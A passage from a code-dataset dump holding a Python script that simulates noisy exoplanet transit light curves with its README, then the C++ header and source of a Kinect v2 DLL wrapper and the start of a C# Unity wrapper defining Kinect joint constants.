"text": "import os\nimport numpy as np\nimport batman\n\nP, a, inc, ecc, omega = 34.75, 16.49, 88.39, 0., 90.\ntimes = np.linspace(0.,27,19440)\ndef transit_model(times, rp):\n params = batman.TransitParams()\n params.t0 = 13.5 # time of inferior conjunction\n params.per = P # orbital period (days)\n params.a = a # semi-major axis (in units of stellar radii)\n params.rp = rp # planet/star radius ratio\n params.inc = inc # orbital inclination (in degrees)\n params.ecc = ecc # eccentricity\n params.w = omega # longitude of periastron (in degrees) p\n params.limb_dark = 'quadratic' # limb darkening profile to use\n coeff1,coeff2 = 0.42767669222857835, 0.32963466956391446\n params.u = [coeff1, coeff2] # limb darkening coefficients\n\n tmodel = batman.TransitModel(params, times.astype('float64'))\n return tmodel.light_curve(params)\n\ndef save_data(folder,fname,index,t,f,precision):\n fout = open(folder+'/'+fname+'_'+str(index)+'.dat','w')\n for i in range(len(t)):\n fout.write('{0:.10f} {1:.10f} {2:.10f} TESS\\n'.format(t[i],f[i],precision*1e-6))\n\n# Number of simulations per bin:\nnsim = 5\n# Precisions:\nsigmas = np.logspace(np.log10(300),np.log10(1000),5)\n# Depths:\ndepths = np.logspace(np.log10(100),np.log10(1000),5)\n# Cuts\nndata_cuts = np.linspace(1,10,5).astype('int')\n\n# Generate datasets:\nfor sigma in sigmas:\n for depth in depths:\n for ndata_cut in ndata_cuts:\n folder_name = 'sim_'+str(ndata_cut)+'_'+str(int(sigma))+'_'+str(int(depth))\n os.mkdir(folder_name)\n for i in range(nsim):\n new_times = np.copy(times)\n if ndata_cut == 1:\n model = transit_model(times,np.sqrt(depth*1e-6))\n else:\n ndata = len(times)/np.double(ndata_cut)\n left_ndata = int(19440./2.) - int(ndata/2.)\n right_ndata = int(19440./2.) + int(ndata/2.)\n new_times = np.copy(times[left_ndata:right_ndata])\n model = transit_model(new_times,np.sqrt(depth*1e-6))\n noise = np.random.normal(0.,sigma*1e-6,len(new_times))\n data = model + noise\n save_data(folder_name,'real_model',i,new_times,model,sigma)\n save_data(folder_name,'noisy_model',i,new_times,data,sigma)\n"
},
{
"alpha_fraction": 0.6548856496810913,
"alphanum_fraction": 0.7110186815261841,
"avg_line_length": 119.25,
"blob_id": "8756bd1afaa17fd77743a0d65e3c78325f22eba8",
"content_id": "eaf12df44f4d875572672e7cbbf40ebc4995fd4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 481,
"license_type": "no_license",
"max_line_length": 403,
"num_lines": 4,
"path": "/README.md",
"repo_name": "nespinoza/BayesianDetectionST",
"src_encoding": "UTF-8",
"text": "Bayesian Detection of Single Transits\n-------------------------------------\n\nThe `generate_lcs.py` code generates file of the form `sim_10_1000_100`. First number is by how much the original dataset has been trimmed (in this case, 10 is a factor of 10 --- if you had 1000 datapoints, this covers only the central 100 datapoints). Next is the lightcurve precision (1000 ppm in this case); and final number is the transit depth of the injected transit in ppm (100 ppm in this case).\n"
}
] | 3 |
YoshihisaNitta/NtKinectDLL
|
https://github.com/YoshihisaNitta/NtKinectDLL
|
8d1cf0a2acf0d78495cac9548af1c8f313afd0b9
|
073186673b6ee47f55d5060594b76b04d12a2906
|
99b5a4a4f6b97bba6b06a9c86250b72fde3fcf07
|
refs/heads/master
| 2022-02-18T09:10:18.354181 | 2019-08-31T13:29:05 | 2019-08-31T13:29:05 | 115,174,756 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6808342337608337,
"alphanum_fraction": 0.6874340176582336,
"avg_line_length": 35.880001068115234,
"blob_id": "b6b95945bc72ed75e5a29557a061f5bba719d56d",
"content_id": "9230dc14d418061ff058e961605f53cc1cd05824",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3788,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 100,
"path": "/NtKinectDLL.h",
"repo_name": "YoshihisaNitta/NtKinectDLL",
"src_encoding": "UTF-8",
"text": "/*\r\n* Copyright (c) 2017 Yoshihisa Nitta\r\n* Released under the MIT license\r\n* http://opensource.org/licenses/mit-license.php\r\n*/\r\n\r\n/*\r\n* NtKinectDLL.h version 1.2.6: 2017/11/08\r\n* http://nw.tsuda.ac.jp/lec/kinect2/NtKinectDLL\r\n*\r\n* requires:\r\n* NtKinect version 1.8.2 and later\r\n*/\r\n\r\n#ifdef NTKINECTDLL_EXPORTS\r\n#define NTKINECTDLL_API __declspec(dllexport)\r\n#else\r\n#define NTKINECTDLL_API __declspec(dllimport)\r\n#endif\r\n\r\nnamespace NtKinectDLL {\r\n extern \"C\" {\r\n NTKINECTDLL_API void* getKinect(void);\r\n NTKINECTDLL_API void stopKinect(void* ptr);\r\n\r\n // OpenCV\r\n NTKINECTDLL_API void imshow(void* ptr);\r\n NTKINECTDLL_API void imshowBlack(void* ptr);\r\n\r\n // CoordinateMapper\r\n /*\r\n NTKINECTDLL_API void mapCameraPointToColorSpace(void* ptr,void* sv,void* cv);\r\n NTKINECTDLL_API void mapCameraPointToDepthSpace(void* ptr,void* sv,void* dv);\r\n NTKINECTDLL_API void mapDepthPointToColorSpace(void* ptr,void* dv,UINT16 depth,void* cv);\r\n NTKINECTDLL_API void mapDepthPointToCameraSpace(void* ptr,void* dv,UINT16 depth,void* sv);\r\n */\r\n NTKINECTDLL_API void mapCameraPointToColorSpace(void* ptr, void* sv, void* cv, int n);\r\n NTKINECTDLL_API void mapCameraPointToDepthSpace(void* ptr, void* sv, void* dv, int n);\r\n NTKINECTDLL_API void mapDepthPointToColorSpace(void* ptr, void* dv, void* dth, void* cv, int n);\r\n NTKINECTDLL_API void mapDepthPointToCameraSpace(void* ptr, void* dv, void* dth, void* sv, int n);\r\n\r\n // Multi Thread\r\n NTKINECTDLL_API void acquire(void* ptr);\r\n NTKINECTDLL_API void release(void* ptr);\r\n\r\n // Audio\r\n NTKINECTDLL_API void setAudio(void* ptr, bool flag);\r\n NTKINECTDLL_API float getBeamAngle(void* ptr);\r\n NTKINECTDLL_API float getBeamAngleConfidence(void* ptr);\r\n NTKINECTDLL_API unsigned __int64 getAudioTrackingId(void* ptr);\r\n NTKINECTDLL_API void openAudio(void* ptr, wchar_t* filename);\r\n NTKINECTDLL_API void closeAudio(void* ptr);\r\n NTKINECTDLL_API bool isOpenedAudio(void* ptr);\r\n\r\n // RGB\r\n NTKINECTDLL_API void setRGB(void* ptr);\r\n NTKINECTDLL_API int getRGB(void* ptr, void* data);\r\n\r\n // Depth\r\n NTKINECTDLL_API void setDepth(void* ptr);\r\n NTKINECTDLL_API int getDepth(void* ptr, void* data);\r\n\r\n // Infrared\r\n NTKINECTDLL_API void setInfrared(void* ptr);\r\n NTKINECTDLL_API int getInfrared(void* ptr, void* data);\r\n\r\n // BodyIndex\r\n NTKINECTDLL_API void setBodyIndex(void* ptr);\r\n NTKINECTDLL_API int getBodyIndex(void* ptr, void* data);\r\n\r\n // Skeleton\r\n NTKINECTDLL_API void setSkeleton(void* ptr);\r\n NTKINECTDLL_API int getSkeleton(void* ptr, void* skelton, void* state, void* id, void* tid);\r\n NTKINECTDLL_API int handState(void* ptr, int id, bool isLeft);\r\n\r\n // Face\r\n NTKINECTDLL_API void setFace(void* ptr, bool flag);\r\n NTKINECTDLL_API int getFace(void* ptr, float* point, float* rect, float* direction, int* property, void* tid);\r\n\r\n // HDFace\r\n NTKINECTDLL_API void setHDFace(void* ptr);\r\n NTKINECTDLL_API int getHDFace(void* ptr, float* point, void* tid, int *status);\r\n\r\n // Gesture\r\n NTKINECTDLL_API void setGestureFile(void* ptr, wchar_t* filename);\r\n NTKINECTDLL_API int setGestureId(void* ptr, wchar_t* name, int id); // id: non-zero\r\n NTKINECTDLL_API void setGesture(void* ptr);\r\n NTKINECTDLL_API int getDiscreteGesture(void* ptr, int* gid, float* confidence, void* tid);\r\n NTKINECTDLL_API int getContinuousGesture(void* ptr, int* gid, float* progress, void* tid);\r\n NTKINECTDLL_API int getGidMapSize();\r\n\r\n // Video\r\n NTKINECTDLL_API void openVideo(void* ptr, wchar_t* filename);\r\n NTKINECTDLL_API void writeVideo(void* ptr);\r\n NTKINECTDLL_API void closeVideo(void* ptr);\r\n }\r\n\r\n //Gesture\r\n std::unordered_map<std::string, int> gidMap;\r\n}\r\n"
},
{
"alpha_fraction": 0.5776862502098083,
"alphanum_fraction": 0.5907275676727295,
"avg_line_length": 34.672767639160156,
"blob_id": "5b097c689bf9eb25f0adda29ba451755b6d2aa12",
"content_id": "1168011d75344085f7032d1a82892b00da22fa62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 16028,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 437,
"path": "/VS2019_CV411/NtKinectDLL/NtKinectDLL/NtKinectDLL.cpp",
"repo_name": "YoshihisaNitta/NtKinectDLL",
"src_encoding": "UTF-8",
"text": "/*\r\n * Copyright (c) 2017 Yoshihisa Nitta\r\n * Released under the MIT license\r\n * http://opensource.org/licenses/mit-license.php\r\n */\r\n\r\n/*\r\n * NtKinectDLL.h version 1.2.6: 2017/11/08\r\n * http://nw.tsuda.ac.jp/lec/kinect2/NtKinectDLL\r\n *\r\n * requires:\r\n * NtKinect version 1.8.2 and after\r\n */\r\n\r\n#include \"pch.h\"\r\n#include \"framework.h\"\r\n\r\n#include <unordered_map>\r\n#include \"NtKinectDLL.h\"\r\n\r\n#define USE_AUDIO\r\n#define USE_FACE\r\n#define USE_GESTURE\r\n#define USE_THREAD\r\n#include \"NtKinect.h\"\r\n\r\nusing namespace std;\r\n\r\nnamespace NtKinectDLL {\r\n string wchar2string(wchar_t* name) {\r\n int len = WideCharToMultiByte(CP_UTF8, NULL, name, -1, NULL, 0, NULL, NULL) + 1;\r\n char* nameBuffer = new char[len];\r\n memset(nameBuffer, '\\0', len);\r\n WideCharToMultiByte(CP_UTF8, NULL, name, -1, nameBuffer, len, NULL, NULL);\r\n string s(nameBuffer);\r\n return s;\r\n }\r\n\r\n NTKINECTDLL_API void* getKinect(void) {\r\n NtKinect* kinect = new NtKinect();\r\n return static_cast<void*>(kinect);\r\n }\r\n NTKINECTDLL_API void stopKinect(void* ptr) {\r\n cv::destroyAllWindows();\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n delete kinect;\r\n }\r\n\r\n // OpenCV\r\n NTKINECTDLL_API void imshow(void* ptr) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n int scale = 4;\r\n cv::Mat img((*kinect).rgbImage);\r\n cv::resize(img, img, cv::Size(img.cols / scale, img.rows / scale), 0, 0);\r\n for (auto& person : (*kinect).skeleton) {\r\n for (auto& joint : person) {\r\n\tif (joint.TrackingState == TrackingState_NotTracked) continue;\r\n\tColorSpacePoint cp;\r\n\t(*kinect).coordinateMapper->MapCameraPointToColorSpace(joint.Position, &cp);\r\n\tcv::rectangle(img, cv::Rect((int)cp.X / scale - 2, (int)cp.Y / scale - 2, 4, 4), cv::Scalar(0, 0, 255), 2);\r\n }\r\n }\r\n for (auto r : (*kinect).faceRect) {\r\n cv::Rect r2(r.x / scale, r.y / scale, r.width / scale, r.height / scale);\r\n cv::rectangle(img, r2, cv::Scalar(255, 255, 0), 2);\r\n }\r\n cv::imshow(\"face\", img);\r\n cv::waitKey(1);\r\n }\r\n\r\n vector<cv::Rect> savedRect;\r\n NTKINECTDLL_API void imshowBlack(void* ptr) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n int scale = 4;\r\n cv::Mat img((*kinect).rgbImage);\r\n cv::resize(img, img, cv::Size(img.cols / scale, img.rows / scale), 0, 0);\r\n if ((*kinect).faceRect.size() == 0) {\r\n for (auto& r : savedRect) {\r\n\t(*kinect).faceRect.push_back(r);\r\n }\r\n }\r\n else {\r\n savedRect.clear();\r\n for (auto& r : (*kinect).faceRect) {\r\n\tsavedRect.push_back(r);\r\n }\r\n }\r\n for (auto r : (*kinect).faceRect) {\r\n cv::Rect r2(r.x / scale, r.y / scale, r.width / scale, r.height / scale);\r\n cv::rectangle(img, r2, cv::Scalar(0, 0, 0), -1);\r\n }\r\n for (auto& person : (*kinect).skeleton) {\r\n for (auto& joint : person) {\r\n\tif (joint.TrackingState == TrackingState_NotTracked) continue;\r\n\tColorSpacePoint cp;\r\n\t(*kinect).coordinateMapper->MapCameraPointToColorSpace(joint.Position, &cp);\r\n\tcv::rectangle(img, cv::Rect((int)cp.X / scale - 2, (int)cp.Y / scale - 2, 4, 4), cv::Scalar(0, 0, 255), 2);\r\n }\r\n }\r\n for (auto r : (*kinect).faceRect) {\r\n cv::Rect r2(r.x / scale, r.y / scale, r.width / scale, r.height / scale);\r\n cv::rectangle(img, r2, cv::Scalar(255, 255, 0), 2);\r\n }\r\n cv::imshow(\"face\", img);\r\n cv::waitKey(1);\r\n }\r\n\r\n // CoordinateMapper\r\n /*\r\n NTKINECTDLL_API void mapCameraPointToColorSpace(void* ptr,void* sv,void* cv) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n CameraSpacePoint sp; sp.X = ((float*)sv)[0]; sp.Y = ((float*)sv)[1]; sp.Z = ((float*)sv)[2];\r\n ColorSpacePoint cp;\r\n (*kinect).coordinateMapper->MapCameraPointToColorSpace(sp,&cp);\r\n ((float*)cv)[0] = cp.X; ((float*)cv)[1] = cp.Y;\r\n }\r\n NTKINECTDLL_API void mapCameraPointToDepthSpace(void* ptr,void* sv,void* dv) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n CameraSpacePoint sp; sp.X = ((float*)sv)[0]; sp.Y = ((float*)sv)[1]; sp.Z = ((float*)sv)[2];\r\n DepthSpacePoint dp;\r\n (*kinect).coordinateMapper->MapCameraPointToDepthSpace(sp,&dp);\r\n ((float*)dv)[0] = dp.X; ((float*)dv)[1] = dp.Y;\r\n }\r\n NTKINECTDLL_API void mapDepthPointToColorSpace(void* ptr,void* dv,UINT16 depth,void* cv) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n DepthSpacePoint dp; dp.X = ((float*)dv)[0]; dp.Y = ((float*)dv)[1];\r\n ColorSpacePoint cp;\r\n (*kinect).coordinateMapper->MapDepthPointToColorSpace(dp,depth,&cp);\r\n ((float*)cv)[0] = cp.X; ((float*)cv)[1] = cp.Y;\r\n }\r\n NTKINECTDLL_API void mapDepthPointToCameraSpace(void* ptr,void* dv,UINT16 depth,void* sv) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n DepthSpacePoint dp; dp.X = ((float*)dv)[0]; dp.Y = ((float*)dv)[1];\r\n CameraSpacePoint sp;\r\n (*kinect).coordinateMapper->MapDepthPointToCameraSpace(dp,depth,&sp);\r\n ((float*)sv)[0] = sp.X; ((float*)sv)[1] = sp.Y; ((float*)sv)[2] = sp.Z;\r\n }\r\n */\r\n NTKINECTDLL_API void mapCameraPointToColorSpace(void* ptr, void* sv, void* cv, int n) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float* sa = (float*)sv;\r\n float* ca = (float*)cv;\r\n for (int i = 0; i<n; i++) {\r\n CameraSpacePoint sp; sp.X = *sa++; sp.Y = *sa++; sp.Z = *sa++;\r\n ColorSpacePoint cp;\r\n (*kinect).coordinateMapper->MapCameraPointToColorSpace(sp, &cp);\r\n *ca++ = cp.X; *ca++ = cp.Y;\r\n }\r\n }\r\n NTKINECTDLL_API void mapCameraPointToDepthSpace(void* ptr, void* sv, void* dv, int n) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float* sa = (float*)sv;\r\n float* da = (float*)dv;\r\n for (int i = 0; i<n; i++) {\r\n CameraSpacePoint sp; sp.X = *sa++; sp.Y = *sa++; sp.Z = *sa++;\r\n DepthSpacePoint dp;\r\n (*kinect).coordinateMapper->MapCameraPointToDepthSpace(sp, &dp);\r\n *da++ = dp.X; *da++ = dp.Y;\r\n }\r\n }\r\n NTKINECTDLL_API void mapDepthPointToColorSpace(void* ptr, void* dv, void* dth, void* cv, int n) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float* da = (float*)dv;\r\n UINT16* dth_addr = (UINT16*)dth;\r\n float* ca = (float*)cv;\r\n for (int i = 0; i<n; i++) {\r\n DepthSpacePoint dp; dp.X = *da++; dp.Y = *da++;\r\n ColorSpacePoint cp;\r\n (*kinect).coordinateMapper->MapDepthPointToColorSpace(dp, *dth_addr++, &cp);\r\n *ca++ = cp.X; *ca++ = cp.Y;\r\n }\r\n }\r\n NTKINECTDLL_API void mapDepthPointToCameraSpace(void* ptr, void* dv, void* dth, void* sv, int n) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float* da = (float*)dv;\r\n UINT16* dth_addr = (UINT16*)dth;\r\n float* sa = (float*)sv;\r\n for (int i = 0; i<n; i++) {\r\n DepthSpacePoint dp; dp.X = *da++; dp.Y = *da++;\r\n CameraSpacePoint sp;\r\n (*kinect).coordinateMapper->MapDepthPointToCameraSpace(dp, *dth_addr++, &sp);\r\n *sa++ = sp.X; *sa++ = sp.Y; *sa++ = sp.Z;\r\n }\r\n }\r\n\r\n // Multi Thread\r\n NTKINECTDLL_API void acquire(void* ptr) { (*static_cast<NtKinect*>(ptr)).acquire(); }\r\n NTKINECTDLL_API void release(void* ptr) { (*static_cast<NtKinect*>(ptr)).release(); }\r\n\r\n // Audio\r\n NTKINECTDLL_API void setAudio(void* ptr, bool flag) { (*static_cast<NtKinect*>(ptr)).setAudio(flag); }\r\n NTKINECTDLL_API float getBeamAngle(void* ptr) { return (*static_cast<NtKinect*>(ptr)).beamAngle; }\r\n NTKINECTDLL_API float getBeamAngleConfidence(void* ptr) { return (*static_cast<NtKinect*>(ptr)).beamAngleConfidence; }\r\n NTKINECTDLL_API unsigned __int64 getAudioTrackingId(void* ptr) { return (*static_cast<NtKinect*>(ptr)).audioTrackingId; }\r\n NTKINECTDLL_API void openAudio(void* ptr, wchar_t* filename) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n (*kinect).openAudio(wchar2string(filename));\r\n }\r\n NTKINECTDLL_API void closeAudio(void* ptr) { (*static_cast<NtKinect*>(ptr)).closeAudio(); }\r\n NTKINECTDLL_API bool isOpenedAudio(void* ptr) { return (*static_cast<NtKinect*>(ptr)).isOpenedAudio(); }\r\n\r\n // RGB\r\n NTKINECTDLL_API void setRGB(void* ptr) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n (*kinect).setRGB();\r\n }\r\n NTKINECTDLL_API int getRGB(void* ptr, void* data) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n char* idx = (char*)data;\r\n for (int y = 0; y<(*kinect).rgbImage.rows; y++) {\r\n for (int x = 0; x<(*kinect).rgbImage.cols; x++) {\r\n\tcv::Vec4b& pxl = (*kinect).rgbImage.at<cv::Vec4b>(y, x);\r\n\t*idx++ = pxl[2]; // Red\r\n\t*idx++ = pxl[1]; // Green\r\n\t*idx++ = pxl[0]; // Blue\r\n\t*idx++ = pxl[3]; // Alpha\r\n }\r\n }\r\n return (int)(idx - (char*)data);\r\n }\r\n\r\n // Depth\r\n NTKINECTDLL_API void setDepth(void* ptr) { (*static_cast<NtKinect*>(ptr)).setDepth(); }\r\n NTKINECTDLL_API int getDepth(void* ptr, void* data) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n UINT16* idx = (UINT16*)data;\r\n for (int y = 0; y<(*kinect).depthImage.rows; y++) {\r\n for (int x = 0; x<(*kinect).depthImage.cols; x++) {\r\n\t*idx++ = (*kinect).depthImage.at<UINT16>(y, x);\r\n }\r\n }\r\n return (int)(idx - (UINT16*)data);\r\n }\r\n\r\n // Infrared\r\n NTKINECTDLL_API void setInfrared(void* ptr) { (*static_cast<NtKinect*>(ptr)).setInfrared(); }\r\n NTKINECTDLL_API int getInfrared(void* ptr, void* data) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n UINT16* idx = (UINT16*)data;\r\n for (int y = 0; y<(*kinect).infraredImage.rows; y++) {\r\n for (int x = 0; x<(*kinect).infraredImage.cols; x++) {\r\n\t*idx++ = (*kinect).infraredImage.at<UINT16>(y, x);\r\n }\r\n }\r\n return (int)(idx - (UINT16*)data);\r\n }\r\n\r\n // bodyIndex\r\n NTKINECTDLL_API void setBodyIndex(void* ptr) { (*static_cast<NtKinect*>(ptr)).setBodyIndex(); }\r\n NTKINECTDLL_API int getBodyIndex(void* ptr, void* data) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n char* idx = (char*)data;\r\n for (int y = 0; y<(*kinect).bodyIndexImage.rows; y++) {\r\n for (int x = 0; x<(*kinect).bodyIndexImage.cols; x++) {\r\n\t*idx++ = (*kinect).bodyIndexImage.at<char>(y, x);\r\n }\r\n }\r\n return (int)(idx - (char*)data);\r\n }\r\n\r\n // Skeleton\r\n NTKINECTDLL_API void setSkeleton(void* ptr) { (*static_cast<NtKinect*>(ptr)).setSkeleton(); }\r\n NTKINECTDLL_API int getSkeleton(void* ptr, void* skel, void* skelState, void* skelId, void* skelTrackingId) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float* skeleton = (float*)skel;\r\n int* state = (int*)skelState;\r\n int* id = (int*)skelId;\r\n UINT64* trackingId = (UINT64*)skelTrackingId;\r\n int idx = 0, jt = 0, st = 0;\r\n for (auto& person : (*kinect).skeleton) {\r\n for (auto& joint : person) {\r\n\tskeleton[jt++] = joint.Position.X;\r\n\tskeleton[jt++] = joint.Position.Y;\r\n\tskeleton[jt++] = joint.Position.Z;\r\n\tstate[st++] = joint.TrackingState;\r\n }\r\n id[idx] = (*kinect).skeletonId[idx];\r\n trackingId[idx] = (*kinect).skeletonTrackingId[idx];\r\n idx++;\r\n }\r\n return idx;\r\n }\r\n NTKINECTDLL_API int handState(void* ptr, int id, bool isLeft) { return (*static_cast<NtKinect*>(ptr)).handState(id, isLeft).first; }\r\n\r\n // Face\r\n NTKINECTDLL_API void setFace(void* ptr, bool isColorSpace) { (*static_cast<NtKinect*>(ptr)).setFace(isColorSpace); }\r\n NTKINECTDLL_API int getFace(void* ptr, float* point, float* rect, float* direction, int* property, void* tid) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float* p = point;\r\n for (auto& face : (*kinect).facePoint) {\r\n for (auto& pt : face) {\r\n\t*p++ = pt.X;\r\n\t*p++ = pt.Y;\r\n }\r\n }\r\n int np = (int)(p - point) / 2;\r\n p = rect;\r\n for (auto& r : (*kinect).faceRect) {\r\n *p++ = (float)r.x;\r\n *p++ = (float)r.y;\r\n *p++ = (float)r.width;\r\n *p++ = (float)r.height;\r\n }\r\n int nr = (int)(p - rect) / 4;\r\n p = direction;\r\n for (auto& d : (*kinect).faceDirection) {\r\n *p++ = d[0];\r\n *p++ = d[1];\r\n *p++ = d[2];\r\n }\r\n int nd = (int)(p - direction) / 3;\r\n int* a = (int*)property;\r\n for (auto& face : (*kinect).faceProperty) {\r\n for (auto& prop : face) {\r\n\t*a++ = prop;\r\n }\r\n }\r\n int npr = (int)(a - property);\r\n UINT64* q = (UINT64*)tid;\r\n for (auto& t : (*kinect).faceTrackingId) {\r\n *q++ = t;\r\n }\r\n int nt = (int)(q - (UINT64*)tid);\r\n return min(nt, min(min(npr, nd), min(nr, np)));\r\n }\r\n\r\n // HDFace\r\n NTKINECTDLL_API void setHDFace(void* ptr) { (*static_cast<NtKinect*>(ptr)).setHDFace(); }\r\n NTKINECTDLL_API int getHDFace(void* ptr, float* point, void* tid, int* status) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n float *p = (float*)point;\r\n for (auto& person : (*kinect).hdfaceVertices) {\r\n for (auto& cp : person) {\r\n\t*p++ = cp.X;\r\n\t*p++ = cp.Y;\r\n\t*p++ = cp.Z;\r\n }\r\n }\r\n UINT64 *q = (UINT64*)tid;\r\n for (auto& t : (*kinect).hdfaceTrackingId) {\r\n *q++ = t;\r\n }\r\n int* r = (int*)status;\r\n for (auto& s : (*kinect).hdfaceStatus) {\r\n *r++ = s.first;\r\n *r++ = s.second;\r\n }\r\n return (int)(*kinect).hdfaceVertices.size();\r\n }\r\n\r\n // Gesture\r\n NTKINECTDLL_API void setGestureFile(void* ptr, wchar_t* filename) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n wstring fname(filename);\r\n (*kinect).setGestureFile(fname);\r\n }\r\n\r\n NTKINECTDLL_API int setGestureId(void* ptr, wchar_t* name, int id) {\r\n int len = WideCharToMultiByte(CP_UTF8, NULL, name, -1, NULL, 0, NULL, NULL) + 1;\r\n char* nameBuffer = new char[len];\r\n memset(nameBuffer, '\\0', len);\r\n WideCharToMultiByte(CP_UTF8, NULL, name, -1, nameBuffer, len, NULL, NULL);\r\n string s(nameBuffer);\r\n gidMap[s] = id;\r\n\r\n return id;\r\n }\r\n\r\n NTKINECTDLL_API void setGesture(void* ptr) { (*static_cast<NtKinect*>(ptr)).setGesture(); }\r\n\r\n NTKINECTDLL_API int getDiscreteGesture(void* ptr, int* gid, float* confidence, void *tid) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n UINT64* trackingId = (UINT64*)tid;\r\n for (int i = 0; i<(*kinect).discreteGesture.size(); i++) {\r\n auto g = (*kinect).discreteGesture[i];\r\n string gname = (*kinect).gesture2string(g.first);\r\n gid[i] = gidMap[gname];\r\n confidence[i] = g.second;\r\n trackingId[i] = (*kinect).discreteGestureTrackingId[i];\r\n }\r\n return (int)(*kinect).discreteGesture.size();\r\n }\r\n\r\n NTKINECTDLL_API int getContinuousGesture(void* ptr, int* gid, float* progress, void *tid) {\r\n NtKinect* kinect = static_cast<NtKinect*>(ptr);\r\n UINT64* trackingId = (UINT64*)tid;\r\n for (int i = 0; i<(*kinect).continuousGesture.size(); i++) {\r\n auto g = (*kinect).continuousGesture[i];\r\n string gname = (*kinect).gesture2string(g.first);\r\n gid[i] = gidMap[gname];\r\n progress[i] = g.second;\r\n trackingId[i] = (*kinect).continuousGestureTrackingId[i];\r\n }\r\n return (int)(*kinect).continuousGesture.size();\r\n }\r\n NTKINECTDLL_API int getGidMapSize() {\r\n return (int)gidMap.size();\r\n }\r\n\r\n // Video\r\n cv::VideoWriter *videoWriter = nullptr;\r\n cv::Size videoSize;\r\n bool videoOnSave = false;\r\n\r\n NTKINECTDLL_API void openVideo(void* ptr, wchar_t* filename) {\r\n NtKinect *kinect = static_cast<NtKinect*>(ptr);\r\n string fname = wchar2string(filename);\r\n if (videoOnSave) {\r\n std::cerr << \"cannot open two video files simultaneously\" << std::endl;\r\n return;\r\n }\r\n videoSize = cv::Size(1920 / 4, 1080 / 4);\r\n videoWriter = new cv::VideoWriter(fname, cv::VideoWriter::fourcc('X', 'V', 'I', 'D'), 30.0, videoSize);\r\n if (!(*videoWriter).isOpened()) {\r\n std::cerr << \"cannot open video file\" << std::endl;\r\n return;\r\n }\r\n videoOnSave = true;\r\n }\r\n NTKINECTDLL_API void writeVideo(void* ptr) {\r\n NtKinect *kinect = static_cast<NtKinect*>(ptr);\r\n cv::Mat img;\r\n if (videoOnSave) {\r\n cv::resize((*kinect).rgbImage, img, videoSize, 0, 0);\r\n cv::cvtColor(img, img, cv::COLOR_BGRA2BGR);\r\n (*videoWriter) << img;\r\n }\r\n }\r\n NTKINECTDLL_API void closeVideo(void* ptr) {\r\n if (videoOnSave) {\r\n (*videoWriter).release();\r\n delete videoWriter;\r\n videoWriter = nullptr;\r\n videoOnSave = false;\r\n }\r\n }\r\n}\r\n"
},
{
"alpha_fraction": 0.6649125814437866,
"alphanum_fraction": 0.6761813759803772,
"avg_line_length": 39.63282775878906,
"blob_id": "240faa31856805d02fcb983202fb1f91d3e29797",
"content_id": "2b9cb23c6b89a2764cae879210eab5d6cc5f7f46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C#",
"length_bytes": 37628,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 926,
"path": "/NtUnity/NtUnity.cs",
"repo_name": "YoshihisaNitta/NtKinectDLL",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (c) 2017 Yoshihisa Nitta\n * Released under the MIT license\n * http://opensource.org/licenses/mit-license.php\n */\n\n/*\n * NtUnity.cs version 1.2 2017/10/05\n * http://nw.tsuda.ac.jp/NtKinectDLL/\n *\n * requires:\n * NtKinectDLL version 1.2.4 or later\n */\n\n\nusing System.Collections;\nusing System.Collections.Generic;\nusing UnityEngine;\nusing System;\nusing System.Runtime.InteropServices;\n\nnamespace NtUnity {\n public class Kinect {\n public const int\n // Number\n bodyCount = 6,\n jointCount = 25,\n rgbCols = 1920,\n rgbRows = 1080,\n depthCols = 512,\n depthRows = 424,\n // JointType\n JointType_SpineBase= 0,\n JointType_SpineMid= 1,\n JointType_Neck= 2,\n JointType_Head= 3,\n JointType_ShoulderLeft= 4,\n JointType_ElbowLeft= 5,\n JointType_WristLeft= 6,\n JointType_HandLeft= 7,\n JointType_ShoulderRight= 8,\n JointType_ElbowRight= 9,\n JointType_WristRight= 10,\n JointType_HandRight= 11,\n JointType_HipLeft= 12,\n JointType_KneeLeft= 13,\n JointType_AnkleLeft= 14,\n JointType_FootLeft= 15,\n JointType_HipRight= 16,\n JointType_KneeRight= 17,\n JointType_AnkleRight= 18,\n JointType_FootRight= 19,\n JointType_SpineShoulder= 20,\n JointType_HandTipLeft= 21,\n JointType_ThumbLeft= 22,\n JointType_HandTipRight= 23,\n JointType_ThumbRight= 24,\n // TrackingState\n TrackingState_NotTracked= 0,\n TrackingState_Inferred= 1,\n TrackingState_Tracked= 2,\n // FacePoint\n FacePointType_None= -1,\n FacePointType_EyeLeft= 0,\n FacePointType_EyeRight= 1,\n 